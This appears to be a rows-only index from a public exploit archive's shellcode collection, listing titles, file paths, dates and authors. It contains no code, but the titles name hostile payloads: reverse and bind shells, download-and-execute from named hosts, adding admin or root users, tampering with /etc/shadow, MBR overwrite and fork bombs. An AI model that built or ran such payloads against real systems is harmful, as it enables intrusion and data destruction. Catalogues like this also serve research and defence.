259 13501 shellcodes/solaris_x86/13501.txt Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13502 shellcodes/solaris_x86/13502.txt Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
261 13503 shellcodes/unixware/13503.txt UnixWare - execve(/bin/sh) Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
262 13504 shellcodes/windows_x86/13504.asm Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
263 13505 shellcodes/windows_x86/13505.c Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
264 13507 shellcodes/windows_x86/13507.txt Windows x86 - Egg Omelet SEH Shellcode Windows/x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
265 13508 shellcodes/windows_x86/13508.asm Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) 2009-02-27 DATA_SNIPER shellcode windows_x86
266 13509 shellcodes/windows_x86/13509.c Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes) Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes) 2009-02-24 Koshi shellcode windows_x86
267 13510 shellcodes/windows_x86/13510.c Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) 2009-02-20 Stack shellcode windows_x86
268 13511 shellcodes/windows_x86/13511.c Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes) Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes) 2009-02-03 Stack shellcode windows_x86
269 13512 shellcodes/windows_x86/13512.c Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) 2008-09-03 Koshi shellcode windows_x86
270 13513 shellcodes/windows_x86/13513.c Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes) 2008-09-03 Koshi shellcode windows_x86
271 13514 shellcodes/windows_x86/13514.asm Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode 2008-08-25 loco shellcode windows_x86
272 13515 shellcodes/generator/13515.pl Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) 2008-03-14 YAG KOHHA shellcode generator
273 13516 shellcodes/windows_x86/13516.asm Windows x86 - Download File + Execute Shellcode (192 bytes) Windows/x86 - Download File + Execute Shellcode (192 bytes) 2007-06-27 czy shellcode windows_x86
274 13517 shellcodes/windows_x86/13517.asm Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) 2007-06-14 Weiss shellcode windows_x86
275 13518 shellcodes/windows_x86/13518.c Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes) Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes) 2007-05-31 ex-pb shellcode windows_x86
276 13519 shellcodes/windows_x86/13519.c Windows SP1/SP2 x86 - Beep Shellcode (35 bytes) Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes) 2006-04-14 xnull shellcode windows_x86
277 13520 shellcodes/windows_x86/13520.c Windows XP SP2 x86 - MessageBox Shellcode (110 bytes) Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes) 2006-01-24 Omega7 shellcode windows_x86
278 13521 shellcodes/windows_x86/13521.asm Windows x86 - Command WinExec() Shellcode (104+ bytes) Windows/x86 - Command WinExec() Shellcode (104+ bytes) 2006-01-24 Weiss shellcode windows_x86
279 13522 shellcodes/windows_x86/13522.c Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) 2005-12-23 darkeagle shellcode windows_x86
280 13523 shellcodes/windows_x86/13523.c Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) 2005-10-28 darkeagle shellcode windows_x86
281 13524 shellcodes/windows_x86/13524.txt Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes) Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes) 2005-08-16 Matthieu Suiche shellcode windows_x86
282 13525 shellcodes/windows_x86/13525.c Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes) 2005-07-26 loco shellcode windows_x86
283 13526 shellcodes/windows_x86/13526.c Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) 2005-01-26 twoci shellcode windows_x86
284 13527 shellcodes/windows_x86/13527.c Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes) 2005-01-09 oc192 shellcode windows_x86
285 13528 shellcodes/generator/13528.c Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) 2004-10-25 lion shellcode generator
286 13529 shellcodes/windows_x86/13529.c Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) 2004-10-25 lion shellcode windows_x86
287 13530 shellcodes/windows_x86/13530.asm Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
288 13531 shellcodes/windows_x86/13531.c Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
289 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
290 13533 shellcodes/windows_x86-64/13533.asm Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
291 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
292 13549 shellcodes/linux_x86/13549.c Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes) Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes) 2009-12-04 ka0x shellcode linux_x86
293 13550 shellcodes/linux_x86/13550.c Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) 2009-12-04 ka0x shellcode linux_x86
294 13551 shellcodes/linux_x86/13551.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes) 2009-12-04 ka0x shellcode linux_x86
295 13553 shellcodes/linux_x86/13553.c Linux/x86 - execve() Shellcode (51 bytes) 2009-12-04 fl0 fl0w shellcode linux_x86
296 13560 shellcodes/windows/13560.txt Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes) Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes) 2009-12-14 anonymous shellcode windows
297 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson shellcode linux_x86
298 13565 shellcodes/windows_x86/13565.asm Windows XP SP3 x86 - ShellExecuteA Shellcode Windows/x86 (XP SP3) - ShellExecuteA Shellcode 2009-12-19 sinn3r shellcode windows_x86
299 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
300 13569 shellcodes/windows_x86/13569.asm Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode 2009-12-24 sinn3r shellcode windows_x86
301 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
302 13571 shellcodes/windows_x86/13571.c Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes) 2009-12-24 Stack shellcode windows_x86
303 13572 shellcodes/linux_x86/13572.c Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) 2009-12-24 $andman shellcode linux_x86
304 13574 shellcodes/windows_x86/13574.c Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
305 13576 shellcodes/linux_x86/13576.asm Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) 2010-01-16 root@thegibson shellcode linux_x86
306 13577 shellcodes/linux_x86/13577.txt Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) 2009-12-30 root@thegibson shellcode linux_x86
307 13578 shellcodes/linux_x86/13578.txt Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) 2009-12-30 root@thegibson shellcode linux_x86
308 13579 shellcodes/linux_x86/13579.c Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) 2009-12-31 $andman shellcode linux_x86
309 13581 shellcodes/windows/13581.txt Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) 2010-01-03 Aodrulez shellcode windows
310 13582 shellcodes/windows/13582.txt Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes) 2010-01-03 Aodrulez shellcode windows
311 13586 shellcodes/linux_x86/13586.txt Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) 2010-01-08 root@thegibson shellcode linux_x86
312 13595 shellcodes/windows_x86/13595.c Windows XP SP2 x86 (French) - calc Shellcode (19 bytes) Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes) 2010-01-20 SkuLL-HackeR shellcode windows_x86
313 13599 shellcodes/linux_x86/13599.txt Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
314 13600 shellcodes/linux_x86/13600.txt Linux/x86 - ip6tables -F Shellcode (47 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
315 13601 shellcodes/linux_x86/13601.txt Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
316 13602 shellcodes/linux_x86/13602.txt Linux/i686 - pacman -R <package> Shellcode (59 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
317 13609 shellcodes/linux_x86/13609.c Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) 2010-02-09 fb1h2s shellcode linux_x86
318 13614 shellcodes/windows_x86/13614.c Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
319 13615 shellcodes/windows_x86/13615.c Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
320 13627 shellcodes/linux_x86/13627.c Linux/x86 - execve(/bin/sh) Shellcode (8 bytes) 2010-02-23 JungHoon Shin shellcode linux_x86
321 13628 shellcodes/linux_x86/13628.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2) 2010-02-27 ipv shellcode linux_x86
322 13630 shellcodes/windows_x86/13630.c Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes) 2010-02-28 Hazem mofeed shellcode windows_x86
323 13631 shellcodes/windows_x86/13631.c Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes) 2010-03-01 Hazem mofeed shellcode windows_x86
324 13632 shellcodes/linux_x86/13632.c Linux/x86 - Disable modsecurity Shellcode (64 bytes) 2010-03-04 sekfault shellcode linux_x86
325 13635 shellcodes/windows_x86/13635.txt Windows x86 - JITed Stage-0 Shellcode Windows/x86 - JITed Stage-0 Shellcode 2010-03-07 Alexey Sintsov shellcode windows_x86
326 13636 shellcodes/windows_x86/13636.c Windows x86 - JITed exec notepad Shellcode Windows/x86 - JITed exec notepad Shellcode 2010-03-08 Alexey Sintsov shellcode windows_x86
327 13639 shellcodes/windows_x86/13639.c Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes) Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes) 2010-03-11 Stoke shellcode windows_x86
328 13642 shellcodes/windows_x86/13642.txt Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes) Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes) 2010-03-18 czy shellcode windows_x86
329 13645 shellcodes/windows/13645.c Windows - Egghunter JITed Stage-0 Shellcode Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode 2010-03-20 Alexey Sintsov shellcode windows
330 13647 shellcodes/windows_x86/13647.txt Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
331 13648 shellcodes/windows_x86/13648.rb Windows x86 - MessageBox Shellcode (Metasploit) Windows/x86 - MessageBox Shellcode (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
332 13649 shellcodes/windows/13649.txt Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
333 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
334 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
335 13670 shellcodes/linux_x86/13670.c Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) 2010-04-14 Magnefikko shellcode linux_x86
336 13671 shellcodes/linux_x86/13671.c Linux/x86 - DoS Badger Game Shellcode (6 bytes) 2010-04-14 Magnefikko shellcode linux_x86
337 13673 shellcodes/linux_x86/13673.c Linux/x86 - DoS SLoc Shellcode (55 bytes) 2010-04-14 Magnefikko shellcode linux_x86
338 13675 shellcodes/linux_x86/13675.c Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes) Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes) 2010-04-17 Magnefikko shellcode linux_x86
339 13676 shellcodes/linux_x86/13676.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) 2010-04-18 sm0k shellcode linux_x86
340 13677 shellcodes/linux_x86/13677.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes) 2010-04-19 Magnefikko shellcode linux_x86
341 13679 shellcodes/generator/13679.py Linux - write() + exit(0) Shellcode (Generator) 2010-04-20 Stoke shellcode generator
342 13680 shellcodes/linux_x86/13680.c Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) 2010-04-21 Jonathan Salwan shellcode linux_x86
343 13681 shellcodes/linux_x86/13681.c Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) 2010-04-21 Jonathan Salwan shellcode linux_x86
344 13682 shellcodes/linux_x86/13682.c Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes) Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes) 2010-04-22 Magnefikko shellcode linux_x86
345 13688 shellcodes/linux_x86-64/13688.c Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) 2010-04-25 zbt shellcode linux_x86-64
346 13691 shellcodes/linux_x86-64/13691.c Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) 2010-04-25 zbt shellcode linux_x86-64
347 13692 shellcodes/linux_x86/13692.c Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) 2010-04-25 condis shellcode linux_x86
348 13697 shellcodes/linux_x86/13697.c Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) 2010-05-04 Jonathan Salwan shellcode linux_x86
349 13698 shellcodes/linux_x86/13698.c Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) 2010-05-05 Jonathan Salwan shellcode linux_x86
350 13699 shellcodes/windows_x86/13699.txt Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode 2010-05-10 Crack_MaN shellcode windows_x86
351 13702 shellcodes/linux_x86/13702.c Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) 2010-05-17 Jonathan Salwan shellcode linux_x86
352 13703 shellcodes/linux_x86/13703.txt Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
353 13704 shellcodes/solaris_x86/13704.c Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
354 13707 shellcodes/solaris_x86/13707.c Solaris/x86 - Halt Shellcode (36 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
355 13709 shellcodes/solaris_x86/13709.c Solaris/x86 - Reboot() Shellcode (37 bytes) 2010-05-21 Jonathan Salwan shellcode solaris_x86
357 13712 shellcodes/linux_x86/13712.c Linux/x86 - Disable ASLR Security Shellcode (106 bytes) 2010-05-25 Jonathan Salwan shellcode linux_x86
358 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix shellcode linux_x86
359 13716 shellcodes/linux_x86/13716.c Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes) 2010-05-27 agix shellcode linux_x86
360 13719 shellcodes/windows_x86-64/13719.txt Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes) Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) 2010-05-28 agix shellcode windows_x86-64
361 13722 shellcodes/linux_x86/13722.c Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) 2010-05-31 antrhacks shellcode linux_x86
362 13723 shellcodes/linux_x86/13723.c Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
363 13724 shellcodes/linux_x86/13724.c Linux/x86 - Kill All Running Process Shellcode (11 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
364 13725 shellcodes/linux_x86/13725.txt Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
365 13726 shellcodes/linux_x86/13726.txt Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
366 13728 shellcodes/linux_x86/13728.c Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes) 2010-06-01 gunslinger_ shellcode linux_x86
367 13729 shellcodes/windows_x86-64/13729.txt Windows 7 x64 - cmd Shellcode (61 bytes) Windows/x86-64 (7) - cmd Shellcode (61 bytes) 2010-06-01 agix shellcode windows_x86-64
368 13730 shellcodes/linux_x86/13730.c Linux/x86 - unlink /etc/shadow Shellcode (33 bytes) Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
369 13731 shellcodes/linux_x86/13731.c Linux/x86 - Hard Reboot Shellcode (29 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
370 13732 shellcodes/linux_x86/13732.c Linux/x86 - Hard Reboot Shellcode (33 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
371 13733 shellcodes/solaris/13733.c Solaris/x86 - SystemV killall Command Shellcode (39 bytes) 2010-06-03 Jonathan Salwan shellcode solaris
377 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
378 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
379 13915 shellcodes/linux_x86-64/13915.txt Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
380 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
381 14014 shellcodes/windows_x86/14014.pl shellcodes/generator/14014.pl Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator) 2010-06-24 d0lc3 shellcode windows_x86 generator
382 14116 shellcodes/arm/14116.txt Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) 2010-06-29 Jonathan Salwan shellcode arm
383 14052 shellcodes/windows/14052.c Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes) 2010-06-25 RubberDuck shellcode windows
384 14097 shellcodes/arm/14097.c Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes) 2010-06-28 Jonathan Salwan shellcode arm
389 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
390 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
391 14218 shellcodes/linux/14218.c Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes) 2010-07-05 gunslinger_ shellcode linux
392 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes) Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ shellcode linux
393 14221 shellcodes/windows/14221.html Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode 2010-07-05 Alexey Sintsov shellcode windows
394 14234 shellcodes/linux_x86/14234.c Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) 2010-07-05 gunslinger_ shellcode linux_x86
395 14235 shellcodes/linux_x86/14235.c Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) 2010-07-05 gunslinger_ shellcode linux_x86
396 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
397 14276 shellcodes/linux_x86/14276.c Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux_x86
398 14288 shellcodes/windows_x86/14288.asm Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
399 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
400 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
401 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
402 14697 shellcodes/windows/14697.c Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
403 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
404 14873 shellcodes/windows_x86/14873.asm Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-02 2010-09-01 dijital1 shellcode windows_x86
405 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
406 15063 shellcodes/windows_x86/15063.c Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) 2010-09-20 ZoRLu shellcode windows_x86
407 15116 shellcodes/arm/15116.cpp Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode 2010-09-26 Celil Ünüver shellcode arm
408 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
409 15202 shellcodes/windows_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
410 15203 shellcodes/windows_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
411 15314 shellcodes/arm/15314.asm Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
